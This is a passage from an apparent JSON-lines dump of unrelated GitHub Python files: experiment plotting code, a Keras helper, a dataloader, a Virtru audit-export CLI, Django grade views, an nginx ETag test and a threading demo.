ttest_rel(dfANOVA[dfANOVA['informed']==True].groupby('participant').mean()['dv'], dfANOVA[dfANOVA['informed']==False].groupby('participant').mean()['dv'])\n print('Paired t-test: ' + str(numRelevantDimensions) + 'D')\n print('t = ' + str(round(t,2)) + '; p = ' + str(round(p,4)))\n\n sns.despine()\n \n if runANOVA:\n dfANOVA = pandas.concat(dfANOVAList_all)\n# aovrm = AnovaRM(data=dfANOVA, depvar='dv', subject='participant', within=['informed', 'numRelevantDimensions', 'trial'], aggregate_func=np.nanmean)\n# result = aovrm.fit()\n# print('Repeated measures ANOVA (three-way):', result)\n if printcsv:\n dfANOVA.to_csv('Rcode/' + varName + '.csv')\n \n if ifPublish:\n for ax in axes:\n ax.spines['top'].set_visible(False)\n ax.spines['right'].set_visible(False)\n ax.tick_params(axis='both', length=3.5, labelsize=fontsize, pad=4.5, width=axes_linewidth)\n ax.set_xlim([0, 30])\n xticklabels = [0, 15, 30]\n ax.set_xticks(xticklabels)\n ax.set_xticklabels(xticklabels)\n if wTitleAxLabel:\n ax.set_xlabel('Trial', labelpad=8, fontsize=fontsize)\n if not wTitle:\n axes[0].set_ylabel(title[varName], fontsize=fontsize)\n else:\n fig.suptitle(title[varName], fontsize=fontsize+0.5, y=0.9)\n ax.spines['bottom'].set_linewidth(axes_linewidth)\n ax.spines['left'].set_linewidth(axes_linewidth)\n \n plt.subplots_adjust(wspace=0.4, top=0.75, bottom=0.25)\n # plt.tight_layout()\n # plt.show()\n else:\n for ax in axes:\n ax.set_xticks(xticklabels)\n ax.set_xticklabels(xticklabels)\n if wTitleAxLabel:\n fig.text(0.5, -0.05, 'Trial', ha='center', fontsize=fontsize)\n fig.text(0.5, 1, title[varName], ha='center', fontsize=fontsize)\n if wLegend:\n if plotType == 'collapsed':\n fig.legend(handles=[varPlot, refPlot], labels=['Participants', 'Chance'], loc=\"center right\", fontsize=fontsize,\n frameon=False)\n else:\n fig.legend(handles=[varPlots[0], varPlots[1], refPlots[0], refPlots[1]],\n labels=['Known', 'Unknown', 'Chance for known', 'Chance for unknown'], fontsize=fontsize,\n loc=\"center right\", frameon=False)\n plt.subplots_adjust(right=0.825, wspace=0.3)\n else:\n plt.subplots_adjust(wspace=0.3)\n\n elif varName == 'typeFeaturesLearningCurve':\n \n if ifPublish:\n fig, axes = plt.subplots(2, 3, sharex=True, figsize=(8, 5))\n fontsize = 12.5\n plt.rcParams.update({'font.size': fontsize})\n linewidth = 2\n axes_linewidth = 1 #1.3\n else:\n fig, axes = plt.subplots(2, 3, sharex=True, figsize=(20, 12 / 3) if 
wLegend else (18, 12 / 3))\n linewidth = 5\n\n for numRelevantDimension in np.arange(3) + 1:\n # for informed and uninformed games separately\n for idx, informed in enumerate([True, False]):\n rewarding_curves = []\n wrong_curves = []\n irrelevant_curves = []\n for participant, workerId in enumerate(workerIds):\n current_df = data[\n (data['workerId'] == workerId) & (data['informed'] == informed) & (\n data['numRelevantDimensions'] == numRelevantDimension)].copy()\n learning_curves = selectedFeatureTypeCounts(current_df, 'learningCurve')\n rewarding_curves.append(learning_curves[0])\n wrong_curves.append(learning_curves[1])\n irrelevant_curves.append(learning_curves[2])\n ax = axes[idx, numRelevantDimension - 1]\n p = [None] * 3\n p[0], _ = plot_learning_curves(ax, varName, rewarding_curves, wIndividualCurves, 'green', np.nan, '', None, gameLength,\n numRelevantDimension, fontsize=fontsize, linewidth=linewidth)\n p[1], _ = plot_learning_curves(ax, varName, wrong_curves, wIndividualCurves, 'orange', np.nan, '', None, gameLength,\n numRelevantDimension, fontsize=fontsize, linewidth=linewidth)\n p[2], _ = plot_learning_curves(ax, varName, irrelevant_curves, wIndividualCurves, 'gray', np.nan, '', None, gameLength,\n numRelevantDimension, fontsize=fontsize, linewidth=linewidth)\n \n if ifPublish:\n for numRelevantDimension in np.arange(3) + 1:\n for idx, informed in enumerate([True, False]):\n ax = axes[idx, numRelevantDimension - 1]\n ax.spines['top'].set_visible(False)\n ax.spines['right'].set_visible(False)\n ax.tick_params(axis='both', length=3.5, labelsize=fontsize, pad=4.5, width=axes_linewidth)\n ax.set_xlim([0, 30])\n xticklabels = [0, 15, 30]\n ax.set_xticks(xticklabels)\n ax.set_xticklabels(xticklabels)\n if not informed:\n ax.set_xlabel('Trial', labelpad=8, fontsize=fontsize)\n else:\n ax.set_title(f'{numRelevantDimension}D-relevant', fontsize=fontsize)\n if numRelevantDimension == 1:\n ax.set_ylabel('Known' if informed else 'Unknown', labelpad=8, fontsize=fontsize)\n \n ax.spines['bottom'].set_linewidth(axes_linewidth)\n ax.spines['left'].set_linewidth(axes_linewidth)\n fig.suptitle('Feature selection type', fontsize=fontsize+0.5, y=0.9)\n plt.subplots_adjust(wspace=0.4, top=0.75, bottom=0.25)\n if wLegend:\n fig.legend(handles=p, labels=['Correct feature', 'Incorrect feature', 'False positive'], bbox_to_anchor=(1, 0.75), frameon=False)\n else:\n for numRelevantDimension in np.arange(3) + 1:\n for idx, informed in enumerate([True, False]):\n ax = axes[idx, numRelevantDimension - 1]\n ax.set_ylim(0, 3)\n if numRelevantDimension == 1:\n ax.set_ylabel('Known' if informed else 'Unknown', fontsize=fontsize)\n if idx == 0:\n ax.set_xlabel(str(numRelevantDimension) + 'D relevant', fontsize=fontsize)\n ax.xaxis.set_label_position('top')\n ax.tick_params(axis='both', labelsize=fontsize)\n if wTitleAxLabel:\n fig.text(0.5, 0.05, 'Trial', ha='center', fontsize=fontsize)\n fig.text(0.5, 0.95, '# features selected per type', ha='center', fontsize=fontsize)\n if wLegend:\n fig.legend(handles=p, labels=['Correct feature', 'Incorrect feature', 'False positive'], loc=\"center right\")\n \n elif varName == 'typeChoiceChange':\n\n if ifPublish:\n fig, axes = plt.subplots(2, 3, sharex=True, figsize=(8, 5))\n fontsize = 12.5\n plt.rcParams.update({'font.size': fontsize})\n linewidth = 2\n axes_linewidth = 1 #1.3\n else:\n fig, axes = plt.subplots(2, 3, sharex=True, figsize=(20, 12 / 3) if wLegend else (18, 12 / 3))\n linewidth = 5\n\n for numRelevantDimension in np.arange(3) + 1:\n # for informed and 
uninformed games separately\n for idx, informed in enumerate([True, False]):\n all_curves = [None] * 5\n p = [None] * 5\n for iCurve in range(5):\n all_curves[iCurve] = []\n for participant, workerId in enumerate(workerIds):\n current_df = data[\n (data['workerId'] == workerId) & (data['informed'] == informed) & (\n data['numRelevantDimensions'] == numRelevantDimension)].copy()\n learning_curves = choiceChangeTypeCounts(current_df)\n for iCurve in range(5):\n all_curves[iCurve].append(learning_curves[iCurve])\n ax = axes[idx, numRelevantDimension - 1]\n colors = plt.rcParams['axes.prop_cycle'].by_key()['color']\n for iCurve in range(5):\n p[iCurve], _ = plot_learning_curves(ax, varName, all_curves[iCurve], wIndividualCurves, colors[iCurve],\n np.nan, '', None, gameLength, numRelevantDimension, fontsize=fontsize, linewidth=linewidth)\n \n if ifPublish:\n for numRelevantDimension in np.arange(3) + 1:\n for idx, informed in enumerate([True, False]):\n ax = axes[idx, numRelevantDimension - 1]\n ax.spines['top'].set_visible(False)\n ax.spines['right'].set_visible(False)\n ax.tick_params(axis='both', length=3.5, labelsize=fontsize, pad=4.5, width=axes_linewidth)\n ax.set_xlim([0, 30])\n xticklabels = [0, 15, 30]\n ax.set_xticks(xticklabels)\n ax.set_xticklabels(xticklabels)\n if not informed:\n ax.set_xlabel('Trial', labelpad=8, fontsize=fontsize)\n else:\n ax.set_title(f'{numRelevantDimension}D-relevant', fontsize=fontsize)\n if numRelevantDimension == 1:\n ax.set_ylabel('Known' if informed else 'Unknown', labelpad=8, fontsize=fontsize)\n ax.spines['bottom'].set_linewidth(axes_linewidth)\n ax.spines['left'].set_linewidth(axes_linewidth)\n fig.suptitle('Choice change type', fontsize=fontsize+0.5, y=0.9)\n plt.subplots_adjust(wspace=0.4, top=0.75, bottom=0.25)\n if wLegend:\n fig.legend(handles=p, labels=['Add', 'Drop', 'Switch within dimension', 'Switch across dimensions', 'Other'], bbox_to_anchor=(1, 0.75), frameon=False)\n else:\n for numRelevantDimension in np.arange(3) + 1:\n for idx, informed in enumerate([True, False]):\n ax = axes[idx, numRelevantDimension - 1]\n ax.set_ylim(0, 1)\n if numRelevantDimension == 1:\n ax.set_ylabel('Unknown' if informed else 'Unknown', fontsize=fontsize)\n if idx == 0:\n ax.set_xlabel(str(numRelevantDimension) + 'D relevant', fontsize=fontsize)\n ax.xaxis.set_label_position('top')\n ax.tick_params(axis='both', labelsize=fontsize)\n if wTitleAxLabel:\n fig.text(0.5, 0.05, 'Trial', ha='center', fontsize=fontsize)\n fig.text(0.5, 0.95, 'Frequency', ha='center', fontsize=fontsize)\n if wLegend:\n fig.legend(handles=p, labels=['add', 'drop', 'switch_within', 'switch_across', 'mixed'], loc=\"center right\")\n \n if showFigure:\n plt.tight_layout()\n plt.show()\n else:\n # plt.tight_layout()\n plt.savefig('figures/' + expVersion + '_' + varName + '.png', bbox_inches='tight')\n \n return fig, axes","repo_name":"mingyus/humans-combine-value-learning-and-hypothesis-testing","sub_path":"learningCurve.py","file_name":"learningCurve.py","file_ext":"py","file_size_in_byte":33417,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"39071418891","text":"from keras.optimizers import Adagrad, Adadelta, Adamax, Nadam\nfrom .metric import F1, J\n\n\ndef get_custom_metrics():\n \"\"\"\n Returns a dictionary of custom metric layers/functions.\n\n Returns\n --------\n A dictionary.\n \"\"\"\n\n return {\n 'global_weighted_f1': F1,\n 'global_macro_j': J\n }\n\n\ndef get_optimizers():\n \"\"\"\n Returns a dictionary of 
optimizer layers.\n\n Returns\n -------\n A dictionary.\n \"\"\"\n\n return {\n 'Adagrad': Adagrad,\n 'Adadelta': Adadelta,\n 'Adamax': Adamax,\n 'Nadam': Nadam\n }\n\n\ndef get_custom_losses():\n \"\"\"\n Returns a dictionary of custom loss functions.\n\n Returns\n -------\n A dictionary.\n \"\"\"\n return {}\n\n\n\ndef build_metrics(metrics_list, kwargs):\n \"\"\"\n Builds tf graph objects from a list of metric names.\n\n Parameters\n ----------\n metrics_list: A string, or a list of strings.\n Each string is the name of a metric.\n kwargs: Dictionary.\n Parameters to pass into the constructor of these metrics.\n\n Returns\n -------\n A list of metric objects.\n \"\"\"\n\n # If metrics is not a list, put it into a list\n if not isinstance(metrics_list, list) and not isinstance(metrics_list, tuple):\n metrics_list = [metrics_list]\n\n # A dictionary of custom metrics objects\n custom_objects = get_custom_metrics()\n\n # If a metric exists in Keras already, do nothing.\n # If a metric is custom, build a new stateful metrics layer.\n metrics = []\n for m in metrics_list:\n if m in custom_objects:\n metrics += custom_objects[m](**kwargs),\n else:\n metrics += m,\n\n return metrics\n\n\ndef build_optimizer(optimizer_name, kwargs):\n \"\"\"\n Builds a tf graph object from an optimizer name.\n\n Parameter\n ---------\n optimizer_name: String.\n Name of an optimizer.\n kwargs: Dictionary.\n Parameters to pass into the constructor of this optimizer.\n\n Return\n ------\n An optimizer.\n \"\"\"\n\n # A dictionary of optimizers\n optimizers = get_optimizers()\n\n return optimizers[optimizer_name](**kwargs)\n\n\ndef build_loss(loss_name, kwargs):\n \"\"\"\n Builds a tf graph object from a loss name.\n\n Parameter\n ---------\n loss_name: String.\n Name of a loss function.\n kwargs: Dictionary.\n Parameters to pass into the constructor of this loss function.\n\n Return\n ------\n A loss function.\n \"\"\"\n losses = get_custom_losses()\n\n if loss_name in losses:\n return losses[loss_name](**kwargs)\n else:\n return loss_name","repo_name":"fagan2888/trace-classifier","sub_path":"trace_classifier/custom_objects.py","file_name":"custom_objects.py","file_ext":"py","file_size_in_byte":2649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"4169363005","text":"#http://acm.timus.ru/help.aspx?topic=python\r\n\r\nimport sys, math\r\nnums = [] #crea una lista vacia llamada nums\r\nfor line in sys.stdin: #a cada elemento en la lista introducida atravez de stdin\r\n for word in line.split(): #los separa en cada espacio y a acada elemento de las nuevas listas\r\n nums.append(float(word)) #los transforma en reales y los pone en la lista nums\r\nnums.reverse() #invierte la lista nums\r\nfor num in nums: #a cada elemento de nums\r\n print(\"%.4f\" % math.sqrt(num))#muestra su raiz cuadrada hasta el 4° decimal en la consola \r\n","repo_name":"bgonzalo/progcomp","sub_path":"bgonzalo_prob1001.py","file_name":"bgonzalo_prob1001.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"69841636487","text":"from utils import *\nimport torch\nfrom torch.utils.data import DataLoader\n\nfrom glob import glob\nfrom PIL import Image\nimport os\nimport pandas as pd\nfrom torchvision import transforms\n\ndef dataloader(data_path):\n\n Images_path_lst=glob(os.path.join(data_path, 'images/*'))\n oasis = pd.read_csv(os.path.join(data_path, 'OASIS.csv'))\n 
oasis['normalized_valence']=min_max_normalize(oasis['Valence_mean'])\n oasis['normalized_arousal']=min_max_normalize(oasis['Arousal_mean'])\n oasis['valence_classification']=reg_to_classification(oasis['normalized_valence'])\n oasis['arousal_classification']=reg_to_classification(oasis['normalized_arousal'])\n\n#이 순서대로 label도 필요하니까\n train_image_lst=glob(os.path.join(data_path, '/train/*'))\n test_image_lst=glob(os.path.join(data_path, '/test/*'))\n \n train_lst=[]\n for i in train_image_lst:\n result=i.split('/')\n result=result[7]\n result=result.split('.')\n result=result[0]\n train_lst.append(result)\n\n test_lst=[]\n for i in test_image_lst:\n result=i.split('/')\n result=result[7]\n result=result.split('.')\n result=result[0]\n test_lst.append(result)\n\n#train_image_lst는 train시킬 이미지들 path\n#train_lst는 이미지들 파일명\n#train, test 폴더 안에 들어 있는 파일 순서대로 train_label(valence, arousal), test_label 만들어야함\n train_valence_lst=[]\n train_arousal_lst=[]\n test_valence_lst=[]\n test_arousal_lst=[]\n\n train_val_clf_lst=[]\n train_aro_clf_lst=[]\n test_val_clf_lst=[]\n test_aro_clf_lst=[]\n\n theme=list(oasis['Theme'])\n valence=list(oasis['normalized_valence'])\n arousal=list(oasis['normalized_arousal'])\n valence_clf=list(oasis['valence_classification'])\n arousal_clf=list(oasis['arousal_classification'])\n\n for i in train_lst:\n idx=theme.index(i)\n train_valence_lst.append(valence[idx])\n train_arousal_lst.append(arousal[idx])\n train_val_clf_lst.append(valence_clf[idx])\n train_aro_clf_lst.append(arousal_clf[idx])\n \n\n for j in test_lst:\n idx=theme.index(i)\n test_valence_lst.append(valence[idx])\n test_arousal_lst.append(arousal[idx])\n test_val_clf_lst.append(valence_clf[idx])\n test_aro_clf_lst.append(arousal_clf[idx])\n\n#train_image_lst는 train시킬 이미지들 path\n#train_lst는 이미지들 파일명\n#train_valence_lst는 train 폴더에 있는 이미지 순서대로 valence 라벨값\n#train_arousal_lst는 train 폴더에 있는 이미지 순서대로 arousal 라벨값\n#train_val_clf_lst는 train 폴더에 있는 이미지 순서대로 valence 0,1 분류된 값\n# train / val 에 대한 transform(전처리)를 각각 정의한 딕셔너리 만들기\n\n data_transforms = {'train': transforms.Compose( [transforms.RandomResizedCrop(224), # 224로 바꿔준다.\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n transforms.Normalize([0.485,0.456,0.406], [0.229,0.224,0.225])] ), # rgb임으로 3개씩; 대중적으로 널리 알려진 값\n 'val': transforms.Compose( [transforms.Resize(256),\n transforms.CenterCrop(224), # 최종적으로 train과 같이 224로 바꿔준다.\n transforms.ToTensor(),\n transforms.Normalize([0.485,0.456,0.406], [0.229,0.224,0.225])] ) # 위와 동일\n }\n\n train_dataset=Dataset(train_image_lst, train_valence_lst, train_arousal_lst, train_val_clf_lst, train_aro_clf_lst, data_transforms['train'])\n test_dataset=Dataset(test_image_lst, test_valence_lst, test_arousal_lst, test_val_clf_lst, test_aro_clf_lst, data_transforms['val'])\n if len(train_dataset) <=0:\n train_dataset = torch.load(os.path.join(data_path, \"train_dataset.pt\"))\n test_dataset = torch.load(os.path.join(data_path, \"test_dataset.pt\"))\n\n train_loader=DataLoader(\n train_dataset, batch_size=32, shuffle=True\n )\n\n test_loader=DataLoader(\n test_dataset, batch_size=32, shuffle=False\n )\n dataloaders = {'train':train_loader, 'test': test_loader}\n dataset_sizes = {'train':len(train_dataset), 'test':len(test_dataset)}\n \n return dataloaders, 
dataset_sizes","repo_name":"YooChae/DSL-23-1-modeling-Img2Music","sub_path":"image_to_sentiment/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":4486,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"11786958611","text":"import argparse\nimport logging\nimport sys\nimport iso8601\nfrom . import utils\nfrom .auditclient import AuditClient\n\nlogger = logging.getLogger(__name__)\n\n\ndef main():\n parser = argparse.ArgumentParser(prog='VirtruAuditExportClient',\n description='Allows the export of audit data from a secure Virtru endpoint.')\n parser.add_argument('-i', '--ini',\n help='Configuration file. Example: config.ini',\n dest='configFile',\n required=True)\n parser.add_argument('-s', '--start',\n help='Start date of query. Example: -s 2019-01-01',\n dest='startDate',\n default='2010-01-01',\n required=False)\n parser.add_argument('-e', '--end',\n help='End date of query. Example: -e 2019-02-01',\n dest='endDate',\n default='2100-01-01',\n required=False)\n parser.add_argument('--csv',\n help='CSV output folder. If defined CSV will be exported',\n dest='csv',\n default=None,\n required=False)\n parser.add_argument('--json',\n help='Json output folder. If defined Json will be exported. Example: output/ '\n '/home/user/json/',\n dest='json',\n default=None,\n required=False)\n parser.add_argument('--sysloghost',\n help='Syslog server. If defined syslog will be exported',\n dest='sysloghost',\n default=None,\n required=False)\n parser.add_argument('--syslogport',\n help='Syslog port. If a different port is required.',\n dest='syslogport',\n default='514',\n required=False)\n parser.add_argument('-b', '--bookmark',\n help='Start from last bookmark',\n dest='useBookMark',\n default=False,\n required=False,\n action='store_true')\n parser.add_argument('-v', '--verbose',\n help='Verbose option',\n dest='verbose',\n default=False,\n required=False,\n action='store_true')\n\n # Get args from config parser\n args = parser.parse_args()\n\n # Set Log level\n loglevel = logging.DEBUG if args.verbose is True else logging.ERROR\n logger.parent.handlers[0].setLevel(loglevel)\n\n # Get config information from config.ini file\n logger.debug('retriving info from config.ini....')\n config = utils.getConfig(args.configFile)\n apiTokenId = config['apiTokenId']\n apiTokenSecret = config['apiTokenSecret']\n apiHost = config['apiHost']\n apiPath = config['apiPath']\n\n # Initialize auditclient\n auditclient = AuditClient(apiTokenSecret, apiTokenId, apiHost, apiPath)\n\n # Begin Processing\n try:\n logger.debug('begin processing......')\n process(args, auditclient, utils)\n except Exception as e:\n logging.exception(e)\n\n\ndef process(args, auditclient, utils):\n\n logger.debug('fetching bookmark.......')\n\n bookMark = utils.getNextPageStartKey()\n nextPageStartKey = None if not bookMark else bookMark['nextpagestartkey']\n\n logger.debug('nextpagestartkey: %s' % (nextPageStartKey))\n\n queryStart = args.startDate\n queryEnd = args.endDate\n\n # Check dates are in valid IS08601 format\n iso8601.parse_date(queryStart)\n iso8601.parse_date(queryEnd)\n\n jsonFolderPath = args.json\n csvFolderPath = args.csv\n syslogHost = args.sysloghost\n syslogPort = args.syslogport\n useBookMark = args.useBookMark\n\n logger.debug('usebookmark: %s' % (useBookMark))\n\n # Syslog logger\n syslogger = None if syslogHost is None else utils.configSysLogger(\n syslogHost, syslogPort)\n\n req = {\n 'method': 'GET',\n 'query': {\n 'start': 
queryStart,\n 'end': queryEnd\n }\n }\n\n if(nextPageStartKey and useBookMark):\n req['query']['nextPageStartKey'] = nextPageStartKey\n\n hasMore = True\n iteration = 1\n\n logger.debug('fetching audit records....')\n while hasMore:\n records = auditclient.fetchRecords(req)\n if(jsonFolderPath and records['docs']):\n utils.exportToJson(jsonFolderPath, records['docs'])\n if(csvFolderPath and records['docs']):\n utils.exportToCsv(csvFolderPath, records['docs'])\n if(syslogHost is not None and records['docs']):\n utils.exportToSysLog(syslogHost, syslogPort,\n syslogger, records['docs'])\n\n if 'nextPageStartKey' in records:\n logger.debug('found nextpagestartkey')\n nextPageStartKey = records['nextPageStartKey']\n req['query']['nextPageStartKey'] = nextPageStartKey\n else:\n hasMore = False\n if records['docs']:\n nextPageStartKey = records['docs'][-1]['recordId']\n\n if(useBookMark):\n utils.saveNextPageStartKey(nextPageStartKey)\n\n print('Iteration :' + str(iteration) + '\\t\\t' + 'Items: ' +\n str(len(records['docs'])) + '\\t\\t' + 'NextPageStartKey: ' + str(nextPageStartKey))\n iteration += 1\n print('All records exported!!!!')\n","repo_name":"virtru/audit-export-client","sub_path":"auditexport/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":5600,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"30363732777","text":"\nfrom .views import home,listfirs,viewcomplaints,complaintdetails,firupdate\nfrom django.urls import path\n\napp_name=\"policeapp\"\n\nurlpatterns = [\n path('', home,name=\"policehome\"),\n path('viewcomplaints/', viewcomplaints,name=\"viewcomplaints\"),\n path('listfirs/', listfirs,name=\"listfirs\"),\n path('complaintdetails/', complaintdetails,name=\"complaintdetails\"),\n path('firupdate/', firupdate,name=\"firupdate\"),\n] \n","repo_name":"marjanp07/mini-project-django","sub_path":"policeapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"5400508657","text":"from django.shortcuts import render , redirect, get_object_or_404\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib import messages\nfrom django.http import HttpResponse\nfrom .models import Students, Student_RegistrationTable, Instructors, Instructor_RegistrationTable, Courses\n\nimport sys\nsys.path.append('../')\n\nfrom Grades.models import Marks, Grades\n\ndef usertype(request,id):\n for obj in Instructors.objects.all():\n if obj.instructor_id==id:\n request.session['usertype'] = 'instructor'\n for obj in Students.objects.all():\n if obj.student_id==id:\n request.session['usertype'] = 'student'\n\n\ndef login_user(request):\n if request.method==\"POST\":\n username = request.POST['username']\n password = request.POST['password']\n user = authenticate(request, username=username, password=password)\n if user is not None:\n login(request, user)\n usertype(request,username)\n if request.user.username==\"admin\":\n return redirect('/admin/')\n else:\n return redirect('home')\n else:\n messages.success(request,(\"Incorrect username or password. 
Please try again\"))\n return redirect('login')\n else:\n return render(request,'registration/login.html',{})\n\ndef logout_user(request):\n logout(request)\n messages.success(request,(\"Logged out successfully.\"))\n return redirect('login')\n\n\n\ndef home(request):\n #usertype(request.user.username)\n request.session['textee']=\"\"\n if request.session['usertype']=='student':\n studentid = request.user.username\n studentinfo= Students.objects.get(student_id=studentid)\n studentcourses = Student_RegistrationTable.objects.filter(student_id=studentid)\n \n if request.method==\"POST\":\n request.session['course'] = request.POST['course']\n return redirect('coursepage')\n\n l1=[]\n for element in studentcourses:\n a = str(element.course_id).strip(\"Courses Object \")\n b = a.strip(\"(\")\n l1.append(b.strip(\")\"))\n\n d={}\n for c in l1:\n courserec = Courses.objects.get(course=c)\n desc = str(courserec.course_desc)\n d[c]=desc\n return render(request, 'registration/home.html',{'info':studentinfo,'courses':d})\n \n elif request.session['usertype']=='instructor':\n inst_id = request.user.username\n inst_info= Instructors.objects.get(instructor_id=inst_id)\n instcourses = Instructor_RegistrationTable.objects.filter(instructor_id=inst_id)\n inst_courses=[]\n for ic in instcourses:\n a=str(ic.course_id).strip(\"Courses Object \")\n b = a.strip(\"(\")\n inst_courses.append(b.strip(\")\"))\n \n if request.method==\"POST\":\n request.session['course'] = request.POST['course']\n return redirect('coursepage')\n return render(request, 'registration/home.html',{'info':inst_info,'courses':inst_courses})\n\n\ndef course_page(request):\n courseinfo = Courses.objects.get(course=request.session['course'])\n return render(request, 'registration/coursepage.html',{'courseinfo':courseinfo})\n\ndef gradesheet(request):\n studentid = request.user.username\n studentGrades = Grades.objects.filter(studentID=studentid)\n l=[]\n for rec in studentGrades:\n a = (str(rec.courseID)).strip(\"Course object \")\n b = a.strip(\"(\")\n l.append(b.strip(\")\"))\n\n studentinfo = Students.objects.get(student_id= studentid)\n\n credits = []\n d = {}\n for c in l:\n cours = Courses.objects.get(course=c)\n credits.append(cours.credit)\n d[c] = cours.credit\n \n totalgrades = 0\n totalcreds = 0\n for key in d:\n for grades in studentGrades:\n if str(grades.courseID) == (\"Courses object (\"+key+\")\"):\n totalgrades += float(grades.grade)*float(d[key])\n totalcreds += float(d[key])\n \n if totalcreds!=0:\n cg = totalgrades/totalcreds\n else:\n cg = 0\n\n return render(request, 'registration/grades.html',{'studentGrades':studentGrades,'courses':l,'studentinfo':studentinfo,'credits':credits,'cg':cg})\n\ndef marks(request):\n if request.session['usertype']=='student':\n studentid = request.user.username\n courseid = request.session['course']\n studentMarks = Marks.objects.filter(studentID=studentid).filter(courseID=courseid)\n studentinfo = Students.objects.get(student_id=studentid)\n return render(request, 'registration/marks.html',{'table':studentMarks,'info':studentinfo,'studentid':studentid})\n \n elif request.session['usertype']=='instructor':\n if request.method==\"POST\":\n if request.POST['marks']==\"Upload marks for assessment\":\n return redirect('uploadmarks')\n elif request.POST['marks']==\"Upload Final Grades\":\n return redirect('uploadfinal')\n return render(request,'registration/uploadgrades.html',{})\n\ndef uploadmarks(request):\n if request.method==\"POST\":\n if request.POST['studentID'] and 
request.POST['assessment'] and request.POST['weightage'] and request.POST['total_marks'] and request.POST['marks']:\n table = Marks()\n table.studentID = Students.objects.get(student_id=request.POST['studentID'])\n table.courseID = Courses.objects.get(course= request.session['course'])\n table.assessment = request.POST['assessment']\n table.weightage = request.POST['weightage']\n table.total_marks = request.POST['total_marks']\n table.marks = request.POST['marks']\n table.save()\n messages.success(request,(\"Data entered\"))\n return redirect('uploadmarks')\n return render(request, 'registration/uploadmarks.html',{})\n\ndef uploadfinal(request):\n if request.method==\"POST\":\n if request.POST['studentID'] and request.POST['grade']:\n table = Grades()\n table.studentID = Students.objects.get(student_id=request.POST['studentID'])\n table.courseID = Courses.objects.get(course= request.session['course'])\n table.grade = int(request.POST['grade'])\n table.save()\n messages.success(request,(\"Data entered\"))\n return redirect('uploadfinal')\n return render(request,'registration/uploadfinal.html',{})","repo_name":"Mitali-N/DevClub-Assignment5","sub_path":"Users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"16"} +{"seq_id":"36796569280","text":"#!/usr/bin/env python\n\nimport requests\n\ndef parse_etag(etag):\n if etag.startswith('W/'): # Weak etag\n etag = etag[2:]\n assert etag.startswith('\"') and etag.endswith('\"')\n return etag[1:-1]\n\ndef to_etag(value):\n return 'W/\"{}\"'.format(value)\n\nnginx_etag = requests.get('http://nginx/').headers['etag']\nnode_etag = requests.get('http://node/').headers['etag']\n\nprint('nginx etag', nginx_etag)\nprint('node etag', node_etag)\n\nnginx_etag = parse_etag(nginx_etag)\nnode_etag = parse_etag(node_etag)\n\nvbar_index = nginx_etag.rindex('|')\nupstream_etag = nginx_etag[:vbar_index]\nproxy_etag = nginx_etag[vbar_index+1:]\n\nprint('proxy etag value', proxy_etag)\nprint('upstream etag value', upstream_etag)\n\nassert node_etag == upstream_etag\n\nassert requests.get('http://node/', headers={\n 'If-None-Match': to_etag(upstream_etag)\n}).status_code == 304\n\nassert requests.get('http://nginx/', headers={\n 'If-None-Match': to_etag('{}|{}'.format(upstream_etag, proxy_etag))\n}).status_code == 304\n\nassert requests.get('http://nginx/', headers={\n 'If-None-Match': to_etag('{}|{}'.format(upstream_etag + 'P', proxy_etag))\n}).status_code == 200\n\nassert requests.get('http://nginx/', headers={\n 'If-None-Match': to_etag('{}|{}'.format(upstream_etag, proxy_etag + 'P'))\n}).status_code == 200\n","repo_name":"Gerhut/nginx-alter-etag","sub_path":"test/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"74842901769","text":"#!/usr/bin/env python3\n# -*- coding:utf-8 -*- \n'多线程'\n__author__ = 'click'\n__date__ = '2018/7/23 下午6:20'\n\nimport time, threading\n\n\ndef threadReadFile():\n print('主线程的名字%s' % threading.current_thread().name)\n # print('读取文件中内容是%s' % myio.ReadAndWrite.readTxt())\n n = 0\n while n < 10:\n n = n + 1\n\n print('执行相加操作结果是%s' % n)\n\n\nt = threading.Thread(target=threadReadFile, name='threadReadFile')\nt.start()\nt.join()\nprint(\"当前线城是%s\" % 
threading.current_thread().name)\n","repo_name":"Alpha-chen/PythonStudy","sub_path":"process/MultiThread.py","file_name":"MultiThread.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"16"} +{"seq_id":"2248640945","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# ---\n# jupyter:\n# jupytext:\n# text_representation:\n# extension: .py\n# format_name: light\n# format_version: '1.4'\n# jupytext_version: 1.2.4\n# kernelspec:\n# display_name: Python 3\n# language: python\n# name: python3\n# ---\n\n# # s_bl_equilibrium_ret [](https://www.arpm.co/lab/redirect.php?code=s_bl_equilibrium_ret&codeLang=Python)\n# For details, see [here](https://www.arpm.co/lab/redirect.php?permalink=eb-blreturns).\n\n# +\nimport numpy as np\nimport pandas as pd\n\nfrom arpym.estimation.cov_2_corr import cov_2_corr\nfrom arpym.estimation.exp_decay_fp import exp_decay_fp\nfrom arpym.statistics.meancov_sp import meancov_sp\nfrom arpym.views.black_litterman import black_litterman\nfrom arpym.views.min_rel_entropy_normal import min_rel_entropy_normal\n# -\n\n# ## [Input parameters](https://www.arpm.co/lab/redirect.php?permalink=s_bl_equilibrium_ret-parameters)\n\nc = 0.5 # confidence level in the views\nc_uninf = 1e-6 # confidence level in the uninformative 